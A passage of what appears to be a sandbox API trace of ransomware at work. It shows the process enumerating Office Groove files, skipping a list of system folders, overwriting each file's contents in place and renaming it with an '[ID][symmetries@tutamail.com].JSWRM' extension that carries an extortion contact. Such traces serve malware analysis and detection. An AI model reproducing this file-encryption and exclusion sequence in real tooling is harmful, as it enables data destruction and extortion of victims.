(lpString1="AlertImage_ContactHighMask.bmp", lpString2="recovery") returned -1 [0131.288] lstrcmpiW (lpString1="AlertImage_ContactHighMask.bmp", lpString2="perflogs") returned -1 [0131.288] lstrcmpiW (lpString1="AlertImage_ContactHighMask.bmp", lpString2="documents and settings") returned -1 [0131.288] lstrcmpiW (lpString1="AlertImage_ContactHighMask.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.288] lstrcmpiW (lpString1="AlertImage_ContactHighMask.bmp", lpString2="system volume information") returned -1 [0131.288] lstrcmpiW (lpString1="AlertImage_ContactHighMask.bmp", lpString2="msocache") returned -1 [0131.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_ContactHighMask.bmp", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0131.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_ContactHighMask.bmp", cchWideChar=30, lpMultiByteStr=0x2412b8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_ContactHighMask.bmp", lpUsedDefaultChar=0x0) returned 30 [0131.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_ContactHighMask.bmp", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0131.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_ContactHighMask.bmp", cchWideChar=30, lpMultiByteStr=0x241358, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_ContactHighMask.bmp", lpUsedDefaultChar=0x0) returned 30 [0131.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.288] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactHighMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_contacthighmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.289] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=7280) returned 1 [0131.289] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.289] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1c70, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x1c70, lpOverlapped=0x0) returned 1 [0131.291] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.291] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1c70, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x1c70, lpOverlapped=0x0) returned 1 [0131.291] CloseHandle (hObject=0x264) returned 1 [0131.291] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactHighMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_contacthighmask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactHighMask.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_contacthighmask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.292] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19817013, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19817013, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f79, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="AlertImage_ContactLow.jpg", cAlternateFileName="ALERTI~4.JPG")) returned 1 [0131.292] lstrcmpiW (lpString1="AlertImage_ContactLow.jpg", lpString2=".") returned 1 [0131.292] lstrcmpiW (lpString1="AlertImage_ContactLow.jpg", lpString2="..") returned 1 [0131.292] lstrcmpiW (lpString1="AlertImage_ContactLow.jpg", lpString2="...") returned 1 [0131.292] lstrcmpiW (lpString1="AlertImage_ContactLow.jpg", lpString2="windows") returned -1 [0131.292] lstrcmpiW (lpString1="AlertImage_ContactLow.jpg", lpString2="recovery") returned -1 [0131.292] lstrcmpiW (lpString1="AlertImage_ContactLow.jpg", lpString2="perflogs") returned -1 [0131.292] lstrcmpiW (lpString1="AlertImage_ContactLow.jpg", lpString2="documents and settings") returned -1 [0131.292] lstrcmpiW (lpString1="AlertImage_ContactLow.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.292] lstrcmpiW (lpString1="AlertImage_ContactLow.jpg", lpString2="system volume information") returned -1 [0131.292] lstrcmpiW (lpString1="AlertImage_ContactLow.jpg", lpString2="msocache") returned -1 [0131.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_ContactLow.jpg", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0131.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_ContactLow.jpg", cchWideChar=25, lpMultiByteStr=0x2411c8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_ContactLow.jpg", lpUsedDefaultChar=0x0) returned 25 [0131.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_ContactLow.jpg", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0131.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_ContactLow.jpg", cchWideChar=25, lpMultiByteStr=0x2412b8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_ContactLow.jpg", lpUsedDefaultChar=0x0) returned 25 [0131.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.292] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactLow.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_contactlow.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.293] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=12153) returned 1 [0131.293] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.293] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2f70, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x2f70, lpOverlapped=0x0) returned 1 [0131.296] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.296] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2f70, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x2f70, lpOverlapped=0x0) returned 1 [0131.296] CloseHandle (hObject=0x264) returned 1 [0131.296] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactLow.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_contactlow.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactLow.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_contactlow.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.297] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19817013, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19817013, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19817013, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c70, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="AlertImage_ContactLowMask.bmp", cAlternateFileName="AL1F1D~1.BMP")) returned 1 [0131.297] lstrcmpiW (lpString1="AlertImage_ContactLowMask.bmp", lpString2=".") returned 1 [0131.297] lstrcmpiW (lpString1="AlertImage_ContactLowMask.bmp", lpString2="..") returned 1 [0131.297] lstrcmpiW (lpString1="AlertImage_ContactLowMask.bmp", lpString2="...") returned 1 [0131.297] lstrcmpiW (lpString1="AlertImage_ContactLowMask.bmp", lpString2="windows") returned -1 [0131.297] lstrcmpiW (lpString1="AlertImage_ContactLowMask.bmp", lpString2="recovery") returned -1 [0131.297] lstrcmpiW (lpString1="AlertImage_ContactLowMask.bmp", lpString2="perflogs") returned -1 [0131.297] lstrcmpiW (lpString1="AlertImage_ContactLowMask.bmp", lpString2="documents and settings") returned -1 [0131.297] lstrcmpiW (lpString1="AlertImage_ContactLowMask.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.297] lstrcmpiW (lpString1="AlertImage_ContactLowMask.bmp", lpString2="system volume information") returned -1 [0131.297] lstrcmpiW (lpString1="AlertImage_ContactLowMask.bmp", lpString2="msocache") returned -1 [0131.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_ContactLowMask.bmp", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0131.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_ContactLowMask.bmp", cchWideChar=29, lpMultiByteStr=0x241010, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_ContactLowMask.bmp", lpUsedDefaultChar=0x0) returned 29 [0131.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_ContactLowMask.bmp", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0131.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_ContactLowMask.bmp", cchWideChar=29, lpMultiByteStr=0x240f98, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_ContactLowMask.bmp", lpUsedDefaultChar=0x0) returned 29 [0131.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactLowMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_contactlowmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.304] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=7280) returned 1 [0131.304] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.304] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1c70, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x1c70, lpOverlapped=0x0) returned 1 [0131.306] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.306] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1c70, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x1c70, lpOverlapped=0x0) returned 1 [0131.306] CloseHandle (hObject=0x264) returned 1 [0131.306] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactLowMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_contactlowmask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_ContactLowMask.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_contactlowmask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.307] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19817013, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19817013, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19817013, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x480d, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="AlertImage_FileHigh.jpg", cAlternateFileName="ALERTI~3.JPG")) returned 1 [0131.307] lstrcmpiW (lpString1="AlertImage_FileHigh.jpg", lpString2=".") returned 1 [0131.307] lstrcmpiW (lpString1="AlertImage_FileHigh.jpg", lpString2="..") returned 1 [0131.307] lstrcmpiW (lpString1="AlertImage_FileHigh.jpg", lpString2="...") returned 1 [0131.307] lstrcmpiW (lpString1="AlertImage_FileHigh.jpg", lpString2="windows") returned -1 [0131.308] lstrcmpiW (lpString1="AlertImage_FileHigh.jpg", lpString2="recovery") returned -1 [0131.308] lstrcmpiW (lpString1="AlertImage_FileHigh.jpg", lpString2="perflogs") returned -1 [0131.308] lstrcmpiW (lpString1="AlertImage_FileHigh.jpg", lpString2="documents and settings") returned -1 [0131.308] lstrcmpiW (lpString1="AlertImage_FileHigh.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.308] lstrcmpiW (lpString1="AlertImage_FileHigh.jpg", lpString2="system volume information") returned -1 [0131.308] lstrcmpiW (lpString1="AlertImage_FileHigh.jpg", lpString2="msocache") returned -1 [0131.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_FileHigh.jpg", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0131.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_FileHigh.jpg", cchWideChar=23, lpMultiByteStr=0x240f70, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_FileHigh.jpg", lpUsedDefaultChar=0x0) returned 23 [0131.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_FileHigh.jpg", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0131.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_FileHigh.jpg", cchWideChar=23, lpMultiByteStr=0x240ef8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_FileHigh.jpg", lpUsedDefaultChar=0x0) returned 23 [0131.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.308] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileHigh.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_filehigh.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.309] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=18445) returned 1 [0131.309] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.309] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4800, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x4800, lpOverlapped=0x0) returned 1 [0131.313] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.313] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4800, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x4800, lpOverlapped=0x0) returned 1 [0131.313] CloseHandle (hObject=0x264) returned 1 [0131.313] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileHigh.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_filehigh.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileHigh.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_filehigh.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.314] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x197cab56, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197cab56, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19817013, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c6e, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="AlertImage_FileHighMask.bmp", cAlternateFileName="ALERTI~2.BMP")) returned 1 [0131.314] lstrcmpiW (lpString1="AlertImage_FileHighMask.bmp", lpString2=".") returned 1 [0131.314] lstrcmpiW (lpString1="AlertImage_FileHighMask.bmp", lpString2="..") returned 1 [0131.314] lstrcmpiW (lpString1="AlertImage_FileHighMask.bmp", lpString2="...") returned 1 [0131.314] lstrcmpiW (lpString1="AlertImage_FileHighMask.bmp", lpString2="windows") returned -1 [0131.314] lstrcmpiW (lpString1="AlertImage_FileHighMask.bmp", lpString2="recovery") returned -1 [0131.314] lstrcmpiW (lpString1="AlertImage_FileHighMask.bmp", lpString2="perflogs") returned -1 [0131.314] lstrcmpiW (lpString1="AlertImage_FileHighMask.bmp", lpString2="documents and settings") returned -1 [0131.314] lstrcmpiW (lpString1="AlertImage_FileHighMask.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.314] lstrcmpiW (lpString1="AlertImage_FileHighMask.bmp", lpString2="system volume information") returned -1 [0131.314] lstrcmpiW (lpString1="AlertImage_FileHighMask.bmp", lpString2="msocache") returned -1 [0131.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_FileHighMask.bmp", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0131.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_FileHighMask.bmp", cchWideChar=27, lpMultiByteStr=0x241060, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_FileHighMask.bmp", lpUsedDefaultChar=0x0) returned 27 [0131.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_FileHighMask.bmp", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0131.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_FileHighMask.bmp", cchWideChar=27, lpMultiByteStr=0x2411c8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_FileHighMask.bmp", lpUsedDefaultChar=0x0) returned 27 [0131.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.315] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileHighMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_filehighmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.315] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=7278) returned 1 [0131.315] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.315] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1c60, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x1c60, lpOverlapped=0x0) returned 1 [0131.317] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.317] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1c60, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x1c60, lpOverlapped=0x0) returned 1 [0131.317] CloseHandle (hObject=0x264) returned 1 [0131.317] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileHighMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_filehighmask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileHighMask.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_filehighmask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.318] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19817013, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19817013, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19817013, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x46de, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="AlertImage_FileOff.jpg", cAlternateFileName="AL97F4~1.JPG")) returned 1 [0131.318] lstrcmpiW (lpString1="AlertImage_FileOff.jpg", lpString2=".") returned 1 [0131.318] lstrcmpiW (lpString1="AlertImage_FileOff.jpg", lpString2="..") returned 1 